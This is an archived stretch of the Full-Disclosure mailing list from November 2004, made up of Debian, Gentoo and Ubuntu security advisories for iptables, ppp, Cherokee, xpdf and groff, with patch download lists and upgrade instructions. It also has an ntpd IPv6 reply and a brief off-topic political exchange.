http://security.debian.org/pool/updates/main/a/abiword/abiword_1.0.2+cvs.2002.06.05-1woody2_sparc.deb
Size/MD5 checksum: 12326 af26ffe3a8a0c96f62f5a93003e11c77
http://security.debian.org/pool/updates/main/a/abiword/abiword-common_1.0.2+cvs.2002.06.05-1woody2_sparc.deb
Size/MD5 checksum: 537396 0b7459a387b34d02fcdf200948022936
http://security.debian.org/pool/updates/main/a/abiword/abiword-gnome_1.0.2+cvs.2002.06.05-1woody2_sparc.deb
Size/MD5 checksum: 1656854 67a1f7d6d4cc1d0a2c120a61e9983ac2
http://security.debian.org/pool/updates/main/a/abiword/abiword-gtk_1.0.2+cvs.2002.06.05-1woody2_sparc.deb
Size/MD5 checksum: 1470270 36c383eec00251183eab2e4cd3add41d
http://security.debian.org/pool/updates/main/a/abiword/abiword-plugins_1.0.2+cvs.2002.06.05-1woody2_sparc.deb
Size/MD5 checksum: 193240 c86d477d0eda07aa9822817933b4413d
These files will probably be moved into the stable distribution on
its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce
lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)
iD8DBQFBhluQW5ql+IAeqTIRAjbeAJsGBRyVSvrKZUO9dtjgpzmYnAY4dwCfc299
52DJk5yBb2HmbajeZBcOSew=
=sG2c
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[Full-Disclosure] Re: ntpd segfaults accessing IPv6 hosts
mayer
gis.net
Date: Mon Nov 01 2004 - 09:30:26 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
----- Original Message Follows -----
> Hi full-disclosure!
>
> ntpd 1:4.2.0a-11 (as in debian testing/sarge and unstable/sid)
> segfaults when accessing ntp servers on IPv6 hosts. I don't know
> whether this bug is exploitable. But such a server on
> pool.ntp.org might DoS many servers.
There are no IPv6 addresses in pool.ntp.org so there is no risk here.
(dig AAAA pool.ntp.org)
>
> There is a fixed version available.
>
The latest ntp-dev tarball should have the fixes. Currently the
number of ntp servers with IPv6 AAAA records is very low.
> For more details see http://bugzilla.ntp.org/show_bug.cgi?id=353
>
> Bernhard
>
Danny
NTP Development
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[Full-Disclosure] [SECURITY] [DSA 580-1] New iptables packages fix modprobe failure
debian-security-announce
lists.debian.org
Date: Mon Nov 01 2004 - 10:31:33 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- --------------------------------------------------------------------------
Debian Security Advisory DSA 580-1 security
debian.org
http://www.debian.org/security/ Martin Schulze
November 1st, 2004 http://www.debian.org/security/faq
- --------------------------------------------------------------------------
Package : iptables
Vulnerability : missing initialisation
Problem-Type : local
Debian-specific: no
CVE ID : CAN-2004-0986
Debian Bug : 219686
Faheem Mitha noticed that the iptables command, an administration tool
for IPv4 packet filtering and NAT, did not always load the required
modules on it own as it was supposed to. This could lead to firewall
rules not being loaded on system startup. This caused a failure in
connection with rules provided by lokkit at least.
For the stable distribution (woody) this problem has been fixed in
version 1.2.6a-5.0woody2.
For the unstable distribution (sid) this problem has been fixed in
version 1.2.11-4.
We recommend that you upgrade your iptables package.
Upgrade Instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 3.0 alias woody
- --------------------------------
Source archives:
http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2.dsc
Size/MD5 checksum: 639 03ce7ecd0cc462b0b0bef08d400f5a39
http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2.diff.gz
Size/MD5 checksum: 82136 6c6305ebf8da551d7cbdfc4fe1149d87
http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a.orig.tar.gz
Size/MD5 checksum: 422313 84aed37b27830c1a74ece6765db0c31c
Alpha architecture:
http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2_alpha.deb
Size/MD5 checksum: 377404 4adc7c8e3b71d6732fe36a223d044fc7
http://security.debian.org/pool/updates/main/i/iptables/iptables-dev_1.2.6a-5.0woody2_alpha.deb
Size/MD5 checksum: 110230 c0e0ecb43614186556adcd714e4d1272
ARM architecture:
http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2_arm.deb
Size/MD5 checksum: 314110 8d0b4d2e6d7af1377cccf91898a7bda6
http://security.debian.org/pool/updates/main/i/iptables/iptables-dev_1.2.6a-5.0woody2_arm.deb
Size/MD5 checksum: 99130 aff30c9fc49fed3c4b21f418b43c4e65
Intel IA-32 architecture:
http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2_i386.deb
Size/MD5 checksum: 287114 b0ff0f6ab787a136d7ef6f8819b04f96
http://security.debian.org/pool/updates/main/i/iptables/iptables-dev_1.2.6a-5.0woody2_i386.deb
Size/MD5 checksum: 96442 1c2d7ec853da4fdca2ca4e5bddd6740f
Intel IA-64 architecture:
http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2_ia64.deb
Size/MD5 checksum: 446814 e9ea93b92e97a66164411be155b93598
http://security.debian.org/pool/updates/main/i/iptables/iptables-dev_1.2.6a-5.0woody2_ia64.deb
Size/MD5 checksum: 116386 42deb79a474dd9d78bddfe723b4ee6c4
HP Precision architecture:
http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2_hppa.deb
Size/MD5 checksum: 345212 4866e88ca61f8ac2778cc3ce44d142ac
http://security.debian.org/pool/updates/main/i/iptables/iptables-dev_1.2.6a-5.0woody2_hppa.deb
Size/MD5 checksum: 95430 c60ef8c05e0c238d8ac7682626f3972d
Motorola 680x0 architecture:
http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2_m68k.deb
Size/MD5 checksum: 289032 f7748d7e5cc9726b7142d918712abd6d
http://security.debian.org/pool/updates/main/i/iptables/iptables-dev_1.2.6a-5.0woody2_m68k.deb
Size/MD5 checksum: 91232 37e6e304f0b4ebf666c4ffc860253a73
Big endian MIPS architecture:
http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2_mips.deb
Size/MD5 checksum: 326050 713a2efd308c98a3a48135664c7a385c
http://security.debian.org/pool/updates/main/i/iptables/iptables-dev_1.2.6a-5.0woody2_mips.deb
Size/MD5 checksum: 106754 f44458bc89644ddb91a63caa498456ad
Little endian MIPS architecture:
http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2_mipsel.deb
Size/MD5 checksum: 327082 731e9de4f81d6ecc114c89b2c54e99c7
http://security.debian.org/pool/updates/main/i/iptables/iptables-dev_1.2.6a-5.0woody2_mipsel.deb
Size/MD5 checksum: 106898 25d89525b8d158f12eaaf2db6635fd14
PowerPC architecture:
http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2_powerpc.deb
Size/MD5 checksum: 321422 a73bf7a5f4696a44abe4dc19d9508cc8
http://security.debian.org/pool/updates/main/i/iptables/iptables-dev_1.2.6a-5.0woody2_powerpc.deb
Size/MD5 checksum: 101350 e81ceac78d6a38cfdd6b8f09e0cb176e
IBM S/390 architecture:
http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2_s390.deb
Size/MD5 checksum: 307826 1092ceb008461ac0323b2ddfc2327c22
http://security.debian.org/pool/updates/main/i/iptables/iptables-dev_1.2.6a-5.0woody2_s390.deb
Size/MD5 checksum: 97020 c5079802be1fed9934527371cf6a99d8
Sun Sparc architecture:
http://security.debian.org/pool/updates/main/i/iptables/iptables_1.2.6a-5.0woody2_sparc.deb
Size/MD5 checksum: 323322 b33b11c7b474c50a84087f99580c122c
http://security.debian.org/pool/updates/main/i/iptables/iptables-dev_1.2.6a-5.0woody2_sparc.deb
Size/MD5 checksum: 98876 dc0ed1d555df1abb1868514fa307a88c
These files will probably be moved into the stable distribution on
its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce
lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)
iD8DBQFBhmTlW5ql+IAeqTIRAhjTAKCH0M8Oz0a5MAXA3NZzk3FufsHzAQCZASWi
cE4GcVBtJ3eVv3jEUr14OeQ=
=agdX
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[Full-Disclosure] [ GLSA 200411-01 ] ppp: Remote denial of service vulnerability
From: Luke Macken (lewk
gentoo.org)
Date: Mon Nov 01 2004 - 11:21:51 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200411-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: ppp: Remote denial of service vulnerability
Date: November 01, 2004
Bugs: #69152
ID: 200411-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
pppd contains a vulnerability that may allow an attacker to crash the
server.
Background
==========
ppp is a Unix implementation of the Point-to-Point Protocol.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-dialup/ppp < 2.4.2-r7 >= 2.4.2-r7
Description
===========
The pppd server improperly verifies header fields, making it vulnerable
to denial of service attacks.
Impact
======
An attacker can cause the pppd server to access memory that it isn't
allowed to, causing the server to crash. No code execution is possible
with this vulnerability, because no data is getting copied.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All ppp users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-dialup/ppp-2.4.2-r7"
References
==========
[ 1 ] BugTraq Advisory
http://www.securityfocus.com/archive/1/379450
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200411-01.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security
gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/1.0
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
iD8DBQBBhnCvRsm3eDkOu7kRAhBbAJ9ceVpC31fsgQwDVqxVVvDH6AHD3wCeO7oi
DA8Xg5r7lWK66546vid99o0=
=Lg20
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[Full-Disclosure] [USN-14-1] xpdf vulnerabilities
From: Martin Pitt (martin.pitt
canonical.com)
Date: Mon Nov 01 2004 - 11:33:42 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
===========================================================
Ubuntu Security Notice 14-1 November 1, 2004
xpdf vulnerabilities
CAN-2004-0888, CAN-2004-0889
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 4.10 (Warty Warthog)
The following packages are affected:
xpdf-reader
xpdf-utils
cupsys
tetex-bin
The problem can be corrected by upgrading the affected package(s) to
version 1.1.20final+cvs20040330-4ubuntu16.2 (cupsys), version
3.00-8ubuntu1.2 (xpdf-reader, xpdf-utils), or version
2.0.2-21ubuntu0.2 (tetex-bin). In general, a standard system upgrade
is sufficient to effect the necessary changes.
Details follow:
Markus Meissner discovered even more integer overflow vulnerabilities
in xpdf, a viewer for PDF files. These integer overflows can
eventually lead to buffer overflows.
The Common UNIX Printing System (CUPS) uses the same code to print PDF
files; tetex-bin uses the code to generate PDF output and process
included PDF files. In any case, these vulnerabilities could be
exploited by an attacker providing a specially crafted PDF file which,
when processed by CUPS, xpdf, or pdflatex, could result in abnormal
program termination or the execution of program code supplied by the
attacker.
In the case of CUPS, this bug could be exploited to gain the privileges of
the CUPS print server (by default, user cupsys).
In the cases of xpdf and pdflatex, this bug could be exploited to gain
the privileges of the user invoking the program.
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.1.20final+cvs20040330-4ubuntu16.2.diff.gz
Size/MD5: 1349183 2a9af09fb2281cc7d8b33a7cbe787c1e
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.1.20final+cvs20040330-4ubuntu16.2.dsc
Size/MD5: 867 0b814f95ca945f00b994b85b21529ed0
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.1.20final+cvs20040330.orig.tar.gz
Size/MD5: 5645146 5eb5983a71b26e4af841c26703fc2f79
http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_2.0.2-21ubuntu0.2.diff.gz
Size/MD5: 110942 d3656e1ce48c5b76d2c4a2e419e46af2
http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_2.0.2-21ubuntu0.2.dsc
Size/MD5: 1062 cf4f5d0938cfe9067c9659ff81446798
http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_2.0.2.orig.tar.gz
Size/MD5: 11677169 8f02d5940bf02072ce5fe05429c90e63
http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf_3.00-8ubuntu1.2.diff.gz
Size/MD5: 47228 aecaab970f7a93ff0aa6eabeab2d8c84
http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf_3.00-8ubuntu1.2.dsc
Size/MD5: 788 79e1a5984f2603684ab96e56d2bfb87d
http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf_3.00.orig.tar.gz
Size/MD5: 534697 95294cef3031dd68e65f331e8750b2c2
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf-common_3.00-8ubuntu1.2_all.deb
Size/MD5: 56176 01178c68df7b149fce48a4c402b5f96d
http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf_3.00-8ubuntu1.2_all.deb
Size/MD5: 1272 8c7d1abd4f790ed93d5f58e3052de6b0
amd64 architecture (Athlon64, Opteron, EM64T Xeon)
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.1.20final+cvs20040330-4ubuntu16.2_amd64.deb
Size/MD5: 58096 ac0101e69dd47329ea063a5b4537402a
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.1.20final+cvs20040330-4ubuntu16.2_amd64.deb
Size/MD5: 105948 88defb355b823d487cd7a03dc428d3e3
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.1.20final+cvs20040330-4ubuntu16.2_amd64.deb
Size/MD5: 3613942 c0b7985c971ba193b8124bf5c69c13f2
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.1.20final+cvs20040330-4ubuntu16.2_amd64.deb
Size/MD5: 61724 ddc259225e40fc2e2fa963df3bd55582
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.1.20final+cvs20040330-4ubuntu16.2_amd64.deb
Size/MD5: 52388 e826f2b159ea716f594bcf8c5cad9a2d
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.1.20final+cvs20040330-4ubuntu16.2_amd64.deb
Size/MD5: 100826 29525bf26d559b76d5dfe16662353308
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-gnutls10_1.1.20final+cvs20040330-4ubuntu16.2_amd64.deb
Size/MD5: 73910 1ea1c865abf1a9973620d66858306652
http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea-dev_2.0.2-21ubuntu0.2_amd64.deb
Size/MD5: 72744 135f2379dd167e61de064be723dba23c
http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea3_2.0.2-21ubuntu0.2_amd64.deb
Size/MD5: 59926 39b8460a7d86e1ad28cfd6b5bbfb27d4
http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_2.0.2-21ubuntu0.2_amd64.deb
Size/MD5: 4327706 f94e137f5fa9aa0cc5b2f60a559af861
http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf-reader_3.00-8ubuntu1.2_amd64.deb
Size/MD5: 666694 4f1aa4a202484f10305d3469db754a3f
http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf-utils_3.00-8ubuntu1.2_amd64.deb
Size/MD5: 1270778 4722054b11da6c2bebfb61287423f32b
i386 architecture (x86 compatible Intel/AMD)
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.1.20final+cvs20040330-4ubuntu16.2_i386.deb
Size/MD5: 57442 2781ff2d7c97b109de7cbc9d88a62cd7
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.1.20final+cvs20040330-4ubuntu16.2_i386.deb
Size/MD5: 103832 f5d421595e723e49dff5bce567057ced
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.1.20final+cvs20040330-4ubuntu16.2_i386.deb
Size/MD5: 3602424 d5b8b43a814af86a83aa5e91c6308dcc
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.1.20final+cvs20040330-4ubuntu16.2_i386.deb
Size/MD5: 61292 3dfd72714a5afb053de5a2ce0b28d266
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.1.20final+cvs20040330-4ubuntu16.2_i386.deb
Size/MD5: 51960 688bfed1ff18c11c34bdac8f7c68846a
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.1.20final+cvs20040330-4ubuntu16.2_i386.deb
Size/MD5: 97530 61356952dd9267eedbc9ee6c27147003
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-gnutls10_1.1.20final+cvs20040330-4ubuntu16.2_i386.deb
Size/MD5: 71172 613ab789243b600cc4b5442f30c106fa
http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea-dev_2.0.2-21ubuntu0.2_i386.deb
Size/MD5: 64830 61293e557d6f0fad07244412917f1053
http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea3_2.0.2-21ubuntu0.2_i386.deb
Size/MD5: 56326 743b2cae54cfbfb38cfbbdb3b4037c53
http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_2.0.2-21ubuntu0.2_i386.deb
Size/MD5: 3812462 196509178e258629483368f89b3a380f
http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf-reader_3.00-8ubuntu1.2_i386.deb
Size/MD5: 631510 22bdbe4b6e1669e632f3ff7a4462d80d
http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf-utils_3.00-8ubuntu1.2_i386.deb
Size/MD5: 1192886 1bf8406a9a11e1cde44101edecf07446
powerpc architecture (Apple Macintosh G3/G4/G5)
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.1.20final+cvs20040330-4ubuntu16.2_powerpc.deb
Size/MD5: 62050 0d94667a4a5ec4b07d4b3af1cad43a1a
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.1.20final+cvs20040330-4ubuntu16.2_powerpc.deb
Size/MD5: 113636 3dfdef5696f579e9f5faf8589c607b78
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.1.20final+cvs20040330-4ubuntu16.2_powerpc.deb
Size/MD5: 3632952 7ab065c5ec821c39fc10ea10e3983d27
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.1.20final+cvs20040330-4ubuntu16.2_powerpc.deb
Size/MD5: 60918 8bc8293f67f4e1a94772dbb29a919634
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.1.20final+cvs20040330-4ubuntu16.2_powerpc.deb
Size/MD5: 54614 4cafe7af9dcedb199b23e50e059b130f
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.1.20final+cvs20040330-4ubuntu16.2_powerpc.deb
Size/MD5: 100214 48a662bb07c036cacc50a3e462382cfc
http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-gnutls10_1.1.20final+cvs20040330-4ubuntu16.2_powerpc.deb
Size/MD5: 74016 83a562bfb37100d1b6f2e107dd7ea09b
http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea-dev_2.0.2-21ubuntu0.2_powerpc.deb
Size/MD5: 74898 b3da7cccc2b9158cf9e76d656ebfc140
http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea3_2.0.2-21ubuntu0.2_powerpc.deb
Size/MD5: 61268 8021461b6861cfabc6fdeebc094e7241
http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_2.0.2-21ubuntu0.2_powerpc.deb
Size/MD5: 4350430 04d2aeb65e2ce086f31f71a8ba37a5f0
http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf-reader_3.00-8ubuntu1.2_powerpc.deb
Size/MD5: 692700 ea37a0a274161869ede9f9787f35c726
http://security.ubuntu.com/ubuntu/pool/main/x/xpdf/xpdf-utils_3.00-8ubuntu1.2_powerpc.deb
Size/MD5: 1310526 9d50c892a6c0452e166e93a825920738
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFBhnN2DecnbV4Fd/IRAj+DAJ9BUwS7yUiZte80FhSmHr7rEglo1ACgzYkE
blhjjwYpEweLqPTcA+9PwAk=
=lkIJ
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[Full-Disclosure] [USN-13-1] groff utility vulnerability
From: Martin Pitt (martin.pitt
canonical.com)
Date: Mon Nov 01 2004 - 11:24:40 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
===========================================================
Ubuntu Security Notice USN-13-1 November 1, 2004
groff utility vulnerability
CAN-2004-0969
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 4.10 (Warty Warthog)
The following packages are affected:
groff
The problem can be corrected by upgrading the affected package to
version 1.18.1.1-1ubuntu0.1. In general, a standard system upgrade
is sufficient to effect the necessary changes.
Details follow:
Recently, Trustix Secure Linux discovered a vulnerability in the groff
package. The utility "groffer" created a temporary directory in an
insecure way, which allowed exploitation of a race condition to create
or overwrite files with the privileges of the user invoking the
program.
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/g/groff/groff_1.18.1.1-1ubuntu0.1.diff.gz
Size/MD5: 122858 a92b7aa4bc54084f4b23b5b9e5ac3c93
http://security.ubuntu.com/ubuntu/pool/main/g/groff/groff_1.18.1.1-1ubuntu0.1.dsc
Size/MD5: 715 43ca684c0d8f9043bbe1379b8f974775
http://security.ubuntu.com/ubuntu/pool/main/g/groff/groff_1.18.1.1.orig.tar.gz
Size/MD5: 2260623 511dbd64b67548c99805f1521f82cc5e
amd64 architecture (Athlon64, Opteron, EM64T Xeon)
http://security.ubuntu.com/ubuntu/pool/main/g/groff/groff-base_1.18.1.1-1ubuntu0.1_amd64.deb
Size/MD5: 856182 2cd0d31b4bff4b82cffb7a908b505e9b
http://security.ubuntu.com/ubuntu/pool/main/g/groff/groff_1.18.1.1-1ubuntu0.1_amd64.deb
Size/MD5: 1889974 32f2d724e153d7fcf0674dadf5a7ed09
i386 architecture (x86 compatible Intel/AMD)
http://security.ubuntu.com/ubuntu/pool/main/g/groff/groff-base_1.18.1.1-1ubuntu0.1_i386.deb
Size/MD5: 807494 58587e715f46456b8835e1a2e79e99a6
http://security.ubuntu.com/ubuntu/pool/main/g/groff/groff_1.18.1.1-1ubuntu0.1_i386.deb
Size/MD5: 1843024 5361659b8437d45e3d1d64be03269c8d
powerpc architecture (Apple Macintosh G3/G4/G5)
http://security.ubuntu.com/ubuntu/pool/main/g/groff/groff-base_1.18.1.1-1ubuntu0.1_powerpc.deb
Size/MD5: 860482 068d0a03621f0194cc518b6c0bc8d7b4
http://security.ubuntu.com/ubuntu/pool/main/g/groff/groff_1.18.1.1-1ubuntu0.1_powerpc.deb
Size/MD5: 1885040 ab4b353bac496dc2ef4d2873bbbc67a2
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFBhnFYDecnbV4Fd/IRAkfsAJ9TemWgN3C5yoPYr3Yjm9BGsx4cTACfRpZ9
ZJ09W+Et8J4H4CFO5OOB/ZU=
=BAZU
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
[Full-Disclosure] [ GLSA 200411-02 ] Cherokee: Format string vulnerability
From: Sune Kloppenborg Jeppesen (jaervosz
gentoo.org)
Date: Mon Nov 01 2004 - 12:05:19 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200411-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: Cherokee: Format string vulnerability
Date: November 01, 2004
Bugs: #67667
ID: 200411-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Cherokee contains a format string vulnerability that could lead to
denial of service or the execution of arbitary code.
Background
==========
Cherokee is an extra-light web server.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-servers/cherokee <= 0.4.17 >= 0.4.17.1
Description
===========
Florian Schilhabel from the Gentoo Linux Security Audit Team found a
format string vulnerability in the cherokee_logger_ncsa_write_string()
function.
Impact
======
Using a specially crafted URL when authenticating via auth_pam, a
malicious user may be able to crash the server or execute arbitrary
code on the target machine with permissions of the user running
Cherokee.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Cherokee users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-servers/cherokee-0.4.17.1"
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200411-02.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security
gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/1.0
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
iD8DBQBBhnrizKC5hMHO6rkRAtC3AJ9CR09GcfkJKtESG1Df/qELoVPYhwCfb6gn
0htO7/qd9VGO5WHss/DQzew=
=I8fR
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Re: [Full-Disclosure] Slightly off-topic: www.georgewbush.com
From: Barry Fitzgerald (bkfsec
sdf.lonestar.org)
Date: Mon Nov 01 2004 - 12:36:18 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Paul Schmehl wrote:
>
>
> Now, PLEASE keep the damn politics off this list, because I assure
> you, I will not sit idly by and allow this kind of unadulterated crap
> to be spewed on this list without responding.
>
> All replies to /dev/null.
>
That's kind of contradictory, wouldn't you say? First you'll respond
to... everything... and then all replies are being filtered into the bit
bucket... very odd.
Seriously, creationist, don't you every just shut the hell up?
-Barry
p.s. As an aside, I love it when people trumpet wars for the
sovereignty of nations and then argue that any nation (France and
Germany) that chooses not to go along with us on our crusade was
violating some unwritten rule that said they always had to blindly back
our decisions... that's some concept of sovereignty there...
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Re: [SPAM] [Full-Disclosure] Spam sent via spambots?
From: James Riden (j.riden
massey.ac.nz)
Date: Mon Nov 01 2004 - 13:33:21 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hugo van der Kooij <hvdkooij
vanderkooij.org> writes:
> Sendmail logs also show a significant number of false recipients which
